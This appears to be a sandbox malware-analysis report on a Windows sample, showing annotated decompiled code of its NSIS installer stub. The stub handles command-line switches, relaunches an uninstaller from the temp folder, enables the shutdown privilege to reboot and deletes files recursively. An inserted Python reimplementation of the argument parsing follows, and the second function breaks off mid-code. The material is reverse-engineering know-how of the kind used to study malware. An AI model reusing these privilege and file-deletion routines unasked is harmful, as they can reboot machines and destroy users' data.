                                                                              				char _v380;
                                                                              				int _v396;
                                                                              				CHAR* _v400;
                                                                              				signed int _v404;
                                                                              				signed int _v408;
                                                                              				char _v416;
                                                                              				intOrPtr _v424;
                                                                              				intOrPtr _t31;
                                                                              				void* _t36;
                                                                              				CHAR* _t41;
                                                                              				signed int _t43;
                                                                              				CHAR* _t46;
                                                                              				signed int _t48;
                                                                              				int _t52;
                                                                              				signed int _t56;
                                                                              				void* _t78;
                                                                              				CHAR* _t89;
                                                                              				signed int _t90;
                                                                              				void* _t91;
                                                                              				CHAR* _t96;
                                                                              				signed int _t97;
                                                                              				signed int _t99;
                                                                              				signed char* _t103;
                                                                              				CHAR* _t105;
                                                                              				signed int _t106;
                                                                              				void* _t108;
                                                                              
                                                                              				_t99 = 0;
                                                                              				_v372 = 0;
                                                                              				_t105 = "Error writing temporary file. Make sure your temp folder is valid."; // default error text; shown at L32 only if neither %TEMP% nor %WINDIR%\Temp validates
                                                                              				_v380 = 0x20;
                                                                              				__imp__#17();
                                                                              				__imp__OleInitialize(0); // executed
                                                                              				 *0x7a3030 = _t31;
                                                                              				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
                                                                              				E004059BF(0x7a2780, "NSIS Error");
                                                                              				_t89 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\"; // state_temp_dir buffer; the decompiler shows its run-time contents as a literal
                                                                              				GetTempPathA(0x400, _t89);
                                                                              				_t36 = E00403116(_t108); // checks that the temp directory is usable (writable); 0 means fall back to %WINDIR%\Temp below
                                                                              				_t109 = _t36;
                                                                              				if(_t36 != 0) {
                                                                              					L2:
                                                                              					_t96 = "\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" ";
                                                                              					DeleteFileA(_t96); // executed
                                                                              					E004059BF(_t96, GetCommandLineA());
                                                                              					 *0x7a2f80 = GetModuleHandleA(0);
                                                                              					_t41 = _t96;
                                                                              					if("\"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe\" " == 0x22) { // decompiler folded *_t96 into the literal: does argv[0] start with a quote?
                                                                              						_v404 = 0x22; // then the argv[0] terminator to seek is '"' instead of ' '
                                                                              						_t41 =  &M007A9001; // one past the opening quote
                                                                              					}
                                                                              					}
                                                                              					_t43 = CharNextA(E004054F7(_t41, _v404));
                                                                              					_v408 = _t43;
                                                                              					while(1) {
                                                                              						_t91 =  *_t43;
                                                                              						_t112 = _t91;
                                                                              						if(_t91 == 0) {
                                                                              							break;
                                                                              						}
                                                                              						__eflags = _t91 - 0x20;
                                                                              						if(_t91 != 0x20) {
                                                                              							L7:
                                                                              							__eflags =  *_t43 - 0x22;
                                                                              							_v404 = 0x20;
                                                                              							if( *_t43 == 0x22) {
                                                                              								_t43 = _t43 + 1;
                                                                              								__eflags = _t43;
                                                                              								_v404 = 0x22;
                                                                              							}
                                                                              							__eflags =  *_t43 - 0x2f;
                                                                              							if( *_t43 != 0x2f) {
                                                                              								L17:
                                                                              								_t43 = E004054F7(_t43, _v404);
                                                                              								__eflags =  *_t43 - 0x22;
                                                                              								if(__eflags == 0) {
                                                                              									_t43 = _t43 + 1;
                                                                              									__eflags = _t43;
                                                                              								}
                                                                              								continue;
                                                                              							} else {
                                                                              								_t43 = _t43 + 1;
                                                                              								__eflags =  *_t43 - 0x53;
                                                                              								if( *_t43 == 0x53) { // "/S" (case-sensitive compare against 'S')
                                                                              									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
                                                                              									if(( *(_t43 + 1) | 0x00000020) == 0x20) { // (c | 0x20) == 0x20 holds only for ' ' or NUL: the switch must end here
                                                                              										_t99 = _t99 | 0x00000002; // FH_FLAGS_SILENT
                                                                              										__eflags = _t99;
                                                                              									}
                                                                              								}
                                                                              								__eflags =  *_t43 - 0x4352434e; // little-endian DWORD 0x4352434e == "NCRC", i.e. the bytes after "/"
                                                                              								if( *_t43 == 0x4352434e) {
                                                                              									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
                                                                              									if(( *(_t43 + 4) | 0x00000020) == 0x20) { // "/NCRC" followed by space or NUL
                                                                              										_t99 = _t99 | 0x00000004; // FH_FLAGS_NO_CRC: skip the installer CRC check
                                                                              										__eflags = _t99;
                                                                              									}
                                                                              								}
                                                                              								__eflags =  *(_t43 - 2) - 0x3d442f20; // little-endian DWORD 0x3d442f20 == " /D=", matched from the byte before the slash (so it must be space-separated and unquoted)
                                                                              								if( *(_t43 - 2) == 0x3d442f20) {
                                                                              									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000; // terminate the command line before " /D=" so it is not passed on to a relaunched uninstaller
                                                                              									__eflags = _t43 + 2;
                                                                              									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t43 + 2); // copy everything after "D=" into the install-directory buffer; /D= is always the last argument, the scan stops here
                                                                              									L22:
                                                                              									_t46 = E00402C37(_t112, _t99); // executed; loads and validates the installer header with the collected flags, returns an error string or 0
                                                                              									_t105 = _t46;
                                                                              									if(_t105 != 0) {
                                                                              										L32:
                                                                              										E00403501();
                                                                              										__imp__OleUninitialize();
                                                                              										if(_t105 == 0) {
                                                                              											__eflags =  *0x7a3014; // reboot-requested flag set by the install script
                                                                              											if( *0x7a3014 != 0) {
                                                                              												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
                                                                              												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
                                                                              												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
                                                                              												__eflags = _t106;
                                                                              												if(_t106 != 0) {
                                                                              													__eflags = _t97;
                                                                              													if(_t97 != 0) {
                                                                              														__eflags = _t90;
                                                                              														if(_t90 != 0) {
                                                                              															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400); // OpenProcessToken(TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
                                                                              															__eflags = _t56;
                                                                              															if(_t56 != 0) {
                                                                              																 *_t97(0, "SeShutdownPrivilege",  &_v400); // LookupPrivilegeValueA: LUID of SeShutdownPrivilege
                                                                              																_v416 = 1; // TOKEN_PRIVILEGES.PrivilegeCount
                                                                              																_v404 = 2; // Attributes = SE_PRIVILEGE_ENABLED
                                                                              																 *_t90(_v424, 0,  &_v416, 0, 0, 0); // AdjustTokenPrivileges: enable shutdown privilege
                                                                              															}
                                                                              														}
                                                                              													}
                                                                              												}
                                                                              												_t52 = ExitWindowsEx(2, 0); // EWX_REBOOT; E00401410(9) below is the reboot-failed callback
                                                                              												__eflags = _t52;
                                                                              												if(_t52 == 0) {
                                                                              													E00401410(9);
                                                                              												}
                                                                              											}
                                                                              											_t48 =  *0x7a302c;
                                                                              											__eflags = _t48 - 0xffffffff;
                                                                              											if(_t48 != 0xffffffff) {
                                                                              												_v396 = _t48;
                                                                              											}
                                                                              											ExitProcess(_v396);
                                                                              										}
                                                                              										E004052BF(_t105, 0x200010);
                                                                              										ExitProcess(2);
                                                                              									}
                                                                              									if( *0x7a2f94 == _t46) { // *0x7a2f94 is the "this stub is an uninstaller" flag; 0 means a normal install, go run it
                                                                              										L31:
                                                                              										 *0x7a302c =  *0x7a302c | 0xffffffff;
                                                                              										_v396 = E00403526();
                                                                              										goto L32;
                                                                              									}
                                                                              									_t103 = E004054F7(_t96, _t46); // _t46 is 0 here: pointer to the terminating NUL of the command line
                                                                              									while(_t103 >= _t96) { // scan backwards for the marker the relaunched uninstaller passes
                                                                              										__eflags =  *_t103 - 0x3d3f5f20; // little-endian DWORD 0x3d3f5f20 == " _?="
                                                                              										if(__eflags == 0) {
                                                                              											break;
                                                                              										}
                                                                              										_t103 = _t103 - 1;
                                                                              										__eflags = _t103;
                                                                              									}
                                                                              									_t116 = _t103 - _t96;
                                                                              									_t105 = "Error launching installer"; // stays set unless the relaunch below succeeds or the "_?=" directory validates
                                                                              									if(_t103 < _t96) { // no " _?=": first run of the uninstaller, copy self to temp and relaunch from there
                                                                              										lstrcatA(_t89, "~nsu.tmp\\"); // %TEMP%\~nsu.tmp\ holds the temporary copy
                                                                              										CreateDirectoryA(_t89, 0);
                                                                              										_v404 = _v404 & 0x00000000;
                                                                              										do {
                                                                              											 *0x79d940 = 0x22; // build "\"<temp>\~nsu.tmp\Au_.exe" (the copy's name changes each iteration, see L43)
                                                                              											lstrcatA(0x79d940, _t89);
                                                                              											lstrcatA(0x79d940, "Au_.exe");
                                                                              											DeleteFileA(0x79d941); // 0x79d941 skips the opening quote
                                                                              											if(_t105 == 0) {
                                                                              												goto L43;
                                                                              											}
                                                                              											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) { // compares the last six characters of our own path with the string at 0x4091A1 (by address, the "u_.exe" tail of the "Au_.exe" literal): refuse to copy again when already running as the temp copy
                                                                              												goto L32;
                                                                              											}
                                                                              											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) { // copy ourselves to the temp name
                                                                              												E00405707(0x79d941, 0); // schedule the temp copy for deletion at next reboot (NSIS MoveFileOnReboot)
                                                                              												if("C:\\Users\\hardz\\AppData\\Local\\Temp" == 0) { // install-directory buffer empty (no /D=)?
                                                                              													E00405513(0x79e140); // then use the directory of the running exe (strip the file name)
                                                                              												} else {
                                                                              													E004059BF(0x79e140, "C:\\Users\\hardz\\AppData\\Local\\Temp"); // else use the /D= directory
                                                                              												}
                                                                              												lstrcatA(0x79d940, "\" "); // relaunch line: "<temp copy>" <original args> _?=<directory>
                                                                              												lstrcatA(0x79d940, _v400); // _v400 holds the original command line after argv[0]
                                                                              												lstrcatA(0x79d940, " _?=");
                                                                              												lstrcatA(0x79d940, 0x79e140);
                                                                              												E004054CC(0x79d940); // add a trailing backslash to the directory
                                                                              												_t78 = E00405247(0x79d940, _t89); // CreateProcess with the temp directory as working directory; returns the process handle
                                                                              												if(_t78 != 0) {
                                                                              													CloseHandle(_t78);
                                                                              													_t105 = 0;
                                                                              												}
                                                                              											}
                                                                              											L43:
                                                                              											"Au_.exe" =  &("Au_.exe"[1]); // decompiler rendering of a byte increment on the literal's first character: Au_.exe, Bu_.exe, Cu_.exe, ...
                                                                              											_v404 = _v404 + 1;
                                                                              										} while (_v404 < 0x1a); // up to 26 candidate names (A..Z)
                                                                              										goto L32;
                                                                              									}
                                                                              									 *_t103 =  *_t103 & 0x00000000; // " _?=" found: cut the command line before it
                                                                              									_t104 =  &(_t103[4]); // the directory follows the marker
                                                                              									if(E004055AC(_t116,  &(_t103[4])) == 0) { // validate it (NSIS is_valid_instpath); otherwise exit with "Error launching installer"
                                                                              										goto L32;
                                                                              									}
                                                                              									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104); // install directory
                                                                              									E004059BF("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104); // output directory (both buffers held the same value, hence the same literal)
                                                                              									_t105 = 0; // clear the error
                                                                              									goto L31;
                                                                              								}
                                                                              								goto L17;
                                                                              							}
                                                                              						} else {
                                                                              							goto L6;
                                                                              						}
                                                                              						do {
                                                                              							L6:
                                                                              							_t43 = _t43 + 1;
                                                                              							__eflags =  *_t43 - 0x20;
                                                                              						} while ( *_t43 == 0x20);
                                                                              						goto L7;
                                                                              					}
                                                                              					goto L22;
                                                                              				}
                                                                              				GetWindowsDirectoryA(_t89, 0x3fb); // %TEMP% unusable: fall back to %WINDIR%\Temp (0x3fb leaves room for "\Temp")
                                                                              				lstrcatA(_t89, "\\Temp");
                                                                              				if(E00403116(_t109) == 0) { // still unusable: exit with the "Error writing temporary file" message
                                                                              					goto L32;
                                                                              				}
                                                                              				goto L2;
                                                                              			}
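As an added illustration, not taken from the report above or from the NSIS source, the following Python reproduces the command-line handling that the decompiled _entry_ performs: the /S, /NCRC and /D= switch scan with its flag values 0x2 and 0x4, the backward search for the " _?=" marker that the relaunched uninstaller passes, the 26 candidate names for the temp copy, and the relaunch line assembled by the lstrcatA calls. The function names (dword_ascii, parse_nsis_cmdline, split_uninstall_marker, uninstaller_names, build_relaunch_cmdline) are mine, and the command lines used in the demo are constructed samples, not values observed in the sandbox run.

```python
import struct

# The decompiled stub compares DWORDs of the command line against immediates.
# On x86 a DWORD load is little-endian, so the readable text is the reverse
# of the hex digits as printed.
def dword_ascii(value: int) -> str:
    """Return the 4 ASCII bytes a little-endian DWORD immediate matches in memory."""
    return struct.pack("<I", value).decode("ascii")

SWITCH_NCRC = dword_ascii(0x4352434E)   # "NCRC": the bytes after "/"
SWITCH_DIR = dword_ascii(0x3D442F20)    # " /D=": install-directory override
UNINST_MARK = dword_ascii(0x3D3F5F20)   # " _?=": passed by the relaunched uninstaller

FH_FLAGS_SILENT = 0x2   # _t99 |= 2 on "/S"
FH_FLAGS_NO_CRC = 0x4   # _t99 |= 4 on "/NCRC"


def _find(s: str, i: int, ch: str) -> int:
    """Index of the next ch at or after i, or len(s) if absent (the E004054F7 scan)."""
    j = s.find(ch, i)
    return len(s) if j < 0 else j


def _end_of_arg(s: str, i: int) -> bool:
    """The stub's (c | 0x20) == 0x20 test: only NUL or space terminates a switch."""
    return i >= len(s) or s[i] == " "


def parse_nsis_cmdline(cmdline: str) -> dict:
    """Replay the argument scan of _entry_ on a full command line (argv[0] included).

    Returns the flag bits, the /D= install directory (None if absent) and the
    remaining arguments exactly as the stub keeps them for a later relaunch.
    """
    flags = 0
    install_dir = None
    # Skip argv[0]: if it starts with a quote, the token ends at the closing quote.
    seek, i = " ", 0
    if cmdline.startswith('"'):
        seek, i = '"', 1
    i = _find(cmdline, i, seek)
    if i < len(cmdline):            # CharNextA: step past the terminator
        i += 1
    realcmds_start = i              # a leading space, if any, is kept, as in the stub
    while i < len(cmdline):
        while i < len(cmdline) and cmdline[i] == " ":
            i += 1
        seek = " "
        if i < len(cmdline) and cmdline[i] == '"':
            i, seek = i + 1, '"'
        if i < len(cmdline) and cmdline[i] == "/":
            i += 1
            # "/S" (case-sensitive, the compare is against 0x53) followed by space/NUL
            if cmdline[i:i + 1] == "S" and _end_of_arg(cmdline, i + 1):
                flags |= FH_FLAGS_SILENT
            if cmdline[i:i + 4] == SWITCH_NCRC and _end_of_arg(cmdline, i + 4):
                flags |= FH_FLAGS_NO_CRC
            # " /D=" is matched two bytes back, so the switch must be preceded by a
            # space and must not be quoted; everything after "=" is the directory
            # and the scan stops here (the stub jumps straight to L22).
            if i >= 2 and cmdline[i - 2:i + 2] == SWITCH_DIR:
                install_dir = cmdline[i + 2:]
                cmdline = cmdline[:i - 2]       # *(t43-2) = 0 truncates the line
                break
        i = _find(cmdline, i, seek)             # skip the rest of this argument
        if i < len(cmdline) and cmdline[i] == '"':
            i += 1
    return {"flags": flags, "install_dir": install_dir,
            "realcmds": cmdline[realcmds_start:]}


def split_uninstall_marker(cmdline: str):
    """Backward search for " _?=" as the uninstaller branch does.

    Returns (command line cut before the marker, directory after it), or
    (cmdline, None) when the marker is absent and the stub would relaunch.
    """
    j = cmdline.rfind(UNINST_MARK)
    if j < 0:
        return cmdline, None
    return cmdline[:j], cmdline[j + len(UNINST_MARK):]


def uninstaller_names():
    """The 26 temp-copy names tried in order: Au_.exe, Bu_.exe, ... Zu_.exe."""
    name = list("Au_.exe")
    for _ in range(0x1A):
        yield "".join(name)
        name[0] = chr(ord(name[0]) + 1)


def build_relaunch_cmdline(temp_copy: str, realcmds: str, self_dir: str) -> str:
    """Concatenate the relaunch line the way the lstrcatA sequence does."""
    return '"' + temp_copy + '" ' + realcmds + " _?=" + self_dir


if __name__ == "__main__":
    # Constructed sample, not the command line observed in the sandbox run.
    sample = '"C:\\Users\\hardz\\Desktop\\NdBLyH2h5d.exe" /S /NCRC /D=C:\\Program Files\\My App'
    print(parse_nsis_cmdline(sample))
    print(list(uninstaller_names())[:3])
```

Running the sample's own path through parse_nsis_cmdline shows that a silent run needs an upper-case /S, and that a /D= value has to be the last argument and unquoted, which is exactly what the *(t43-2) compare in the listing enforces.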
                                                                              0x004034d3
                                                                              0x004034a7
                                                                              0x00403493
                                                                              0x0040348f
                                                                              0x004034d8
                                                                              0x004034de
                                                                              0x004034e0
                                                                              0x004034e4
                                                                              0x004034e4
                                                                              0x004034e0
                                                                              0x004034e9
                                                                              0x004034ee
                                                                              0x004034f1
                                                                              0x004034f3
                                                                              0x004034f3
                                                                              0x004034fb
                                                                              0x004034fb
                                                                              0x0040332f
                                                                              0x00403336
                                                                              0x00403336
                                                                              0x004032bb
                                                                              0x00403306
                                                                              0x00403306
                                                                              0x00403312
                                                                              0x00000000
                                                                              0x00403312
                                                                              0x004032c4
                                                                              0x004032d1
                                                                              0x004032c8
                                                                              0x004032ce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004032d0
                                                                              0x004032d0
                                                                              0x004032d0
                                                                              0x004032d5
                                                                              0x004032d7
                                                                              0x004032dc
                                                                              0x00403342
                                                                              0x0040334a
                                                                              0x00403350
                                                                              0x0040335f
                                                                              0x00403361
                                                                              0x0040336a
                                                                              0x00403375
                                                                              0x0040337f
                                                                              0x00403387
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033b3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004033c9
                                                                              0x004033d2
                                                                              0x004033de
                                                                              0x004033ee
                                                                              0x004033e0
                                                                              0x004033e6
                                                                              0x004033e6
                                                                              0x004033f9
                                                                              0x00403403
                                                                              0x0040340e
                                                                              0x00403415
                                                                              0x0040341b
                                                                              0x00403422
                                                                              0x00403429
                                                                              0x0040342c
                                                                              0x00403432
                                                                              0x00403432
                                                                              0x00403429
                                                                              0x00403434
                                                                              0x00403434
                                                                              0x0040343a
                                                                              0x0040343e
                                                                              0x00000000
                                                                              0x00403449
                                                                              0x004032de
                                                                              0x004032e1
                                                                              0x004032ec
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004032f4
                                                                              0x004032ff
                                                                              0x00403304
                                                                              0x00000000
                                                                              0x00403304
                                                                              0x00000000
                                                                              0x0040327d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403231
                                                                              0x00403231
                                                                              0x00403231
                                                                              0x00403232
                                                                              0x00403232
                                                                              0x00000000
                                                                              0x00403231
                                                                              0x00000000
                                                                              0x00403295
                                                                              0x004031bc
                                                                              0x004031c8
                                                                              0x004031d4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              • #17.COMCTL32 ref: 00403164
                                                                              • OleInitialize.OLE32(00000000), ref: 0040316B
                                                                              • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
                                                                                • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
                                                                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
                                                                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
                                                                                • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
                                                                              • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\NdBLyH2h5d.exe" ), ref: 004031E0
                                                                              • GetCommandLineA.KERNEL32 ref: 004031E6
                                                                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000), ref: 004031F5
                                                                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000020), ref: 00403220
                                                                              • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
                                                                              • ExitProcess.KERNEL32 ref: 00403336
                                                                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\NdBLyH2h5d.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
                                                                              • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
                                                                              • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
                                                                              • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
                                                                              • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
                                                                              • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
                                                                              • CopyFileA.KERNEL32(0079E140,0079D941,00000000), ref: 004033C1
                                                                              • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
                                                                              • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
                                                                              • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
                                                                              • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
                                                                              • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
                                                                              • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
                                                                              • ExitProcess.KERNEL32 ref: 004034FB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
                                                                              • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\NdBLyH2h5d.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
                                                                              • API String ID: 3079827372-633356775
                                                                              • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                              • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
                                                                              • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
                                                                              • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 98%
                                                                              			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                                                              				signed int _v8;
                                                                              				signed int _v12;
                                                                              				struct _WIN32_FIND_DATAA _v332;
                                                                              				signed int _t37;
                                                                              				char* _t49;
                                                                              				signed char _t51;
                                                                              				signed int _t54;
                                                                              				signed int _t57;
                                                                              				signed int _t63;
                                                                              				signed int _t65;
                                                                              				void* _t67;
                                                                              				signed int _t70;
                                                                              				CHAR* _t72;
                                                                              				CHAR* _t74;
                                                                              				char* _t77;
                                                                              				CHAR* _t31; /* assigned from _t72 below; the decompiler output left it undeclared */
                                                                              
                                                                              				_t74 = _a4;
                                                                              				_t37 = E004055AC(__eflags, _t74);
                                                                              				_v12 = _t37;
                                                                              				if((_a8 & 0x00000008) != 0) {
                                                                              					_t65 = DeleteFileA(_t74); // executed
                                                                              					asm("sbb eax, eax");
                                                                              					_t67 =  ~_t65 + 1;
                                                                              					 *0x7a3008 =  *0x7a3008 + _t67;
                                                                              					return _t67;
                                                                              				}
                                                                              				_t70 = _a8 & 0x00000001;
                                                                              				__eflags = _t70;
                                                                              				_v8 = _t70;
                                                                              				if(_t70 == 0) {
                                                                              					L5:
                                                                              					E004059BF(0x7a0588, _t74);
                                                                              					__eflags = _t70;
                                                                              					if(_t70 == 0) {
                                                                              						E00405513(_t74);
                                                                              					} else {
                                                                              						lstrcatA(0x7a0588, "\\*.*");
                                                                              					}
                                                                              					lstrcatA(_t74, 0x409010);
                                                                              					_t72 =  &(_t74[lstrlenA(_t74)]);
                                                                              					_t37 = FindFirstFileA(0x7a0588,  &_v332);
                                                                              					__eflags = _t37 - 0xffffffff;
                                                                              					_a4 = _t37;
                                                                              					if(_t37 == 0xffffffff) {
                                                                              						L26:
                                                                              						__eflags = _v8;
                                                                              						if(_v8 != 0) {
                                                                              							_t31 = _t72 - 1;
                                                                              							 *_t31 =  *(_t72 - 1) & 0x00000000;
                                                                              							__eflags =  *_t31;
                                                                              						}
                                                                              						goto L28;
                                                                              					} else {
                                                                              						goto L9;
                                                                              					}
                                                                              					do {
                                                                              						L9:
                                                                              						_t77 =  &(_v332.cFileName);
                                                                              						_t49 = E004054F7( &(_v332.cFileName), 0x3f);
                                                                              						__eflags =  *_t49;
                                                                              						if( *_t49 != 0) {
                                                                              							__eflags = _v332.cAlternateFileName;
                                                                              							if(_v332.cAlternateFileName != 0) {
                                                                              								_t77 =  &(_v332.cAlternateFileName);
                                                                              							}
                                                                              						}
                                                                              						__eflags =  *_t77 - 0x2e;
                                                                              						if( *_t77 != 0x2e) {
                                                                              							L16:
                                                                              							E004059BF(_t72, _t77);
                                                                              							_t51 = _v332.dwFileAttributes;
                                                                              							__eflags = _t51 & 0x00000010;
                                                                              							if((_t51 & 0x00000010) == 0) {
                                                                              								SetFileAttributesA(_t74, _t51 & 0x000000fe);
                                                                              								_t54 = DeleteFileA(_t74);
                                                                              								__eflags = _t54;
                                                                              								if(_t54 != 0) {
                                                                              									E00404D62(0xfffffff2, _t74);
                                                                              								} else {
                                                                              									__eflags = _a8 & 0x00000004;
                                                                              									if((_a8 & 0x00000004) == 0) {
                                                                              										 *0x7a3008 =  *0x7a3008 + 1;
                                                                              									} else {
                                                                              										E00404D62(0xfffffff1, _t74);
                                                                              										E00405707(_t74, 0);
                                                                              									}
                                                                              								}
                                                                              							} else {
                                                                              								__eflags = (_a8 & 0x00000003) - 3;
                                                                              								if(__eflags == 0) {
                                                                              									E00405301(_t72, __eflags, _t74, _a8);
                                                                              								}
                                                                              							}
                                                                              							goto L24;
                                                                              						}
                                                                              						_t63 =  *((intOrPtr*)(_t77 + 1));
                                                                              						__eflags = _t63;
                                                                              						if(_t63 == 0) {
                                                                              							goto L24;
                                                                              						}
                                                                              						__eflags = _t63 - 0x2e;
                                                                              						if(_t63 != 0x2e) {
                                                                              							goto L16;
                                                                              						}
                                                                              						__eflags =  *((char*)(_t77 + 2));
                                                                              						if( *((char*)(_t77 + 2)) == 0) {
                                                                              							goto L24;
                                                                              						}
                                                                              						goto L16;
                                                                              						L24:
                                                                              						_t57 = FindNextFileA(_a4,  &_v332);
                                                                              						__eflags = _t57;
                                                                              					} while (_t57 != 0);
                                                                              					_t37 = FindClose(_a4);
                                                                              					goto L26;
                                                                              				} else {
                                                                              					__eflags = _t37;
                                                                              					if(_t37 == 0) {
                                                                              						L28:
                                                                              						__eflags = _v8;
                                                                              						if(_v8 == 0) {
                                                                              							L36:
                                                                              							return _t37;
                                                                              						}
                                                                              						__eflags = _v12;
                                                                              						if(_v12 != 0) {
                                                                              							_t37 = E00405C94(_t74);
                                                                              							__eflags = _t37;
                                                                              							if(_t37 == 0) {
                                                                              								goto L36;
                                                                              							}
                                                                              							E004054CC(_t74);
                                                                              							SetFileAttributesA(_t74, 0x80);
                                                                              							_t37 = RemoveDirectoryA(_t74);
                                                                              							__eflags = _t37;
                                                                              							if(_t37 != 0) {
                                                                              								return E00404D62(0xffffffe5, _t74);
                                                                              							}
                                                                              							__eflags = _a8 & 0x00000004;
                                                                              							if((_a8 & 0x00000004) == 0) {
                                                                              								goto L30;
                                                                              							}
                                                                              							E00404D62(0xfffffff1, _t74);
                                                                              							return E00405707(_t74, 0);
                                                                              						}
                                                                              						L30:
                                                                              						 *0x7a3008 =  *0x7a3008 + 1;
                                                                              						return _t37;
                                                                              					}
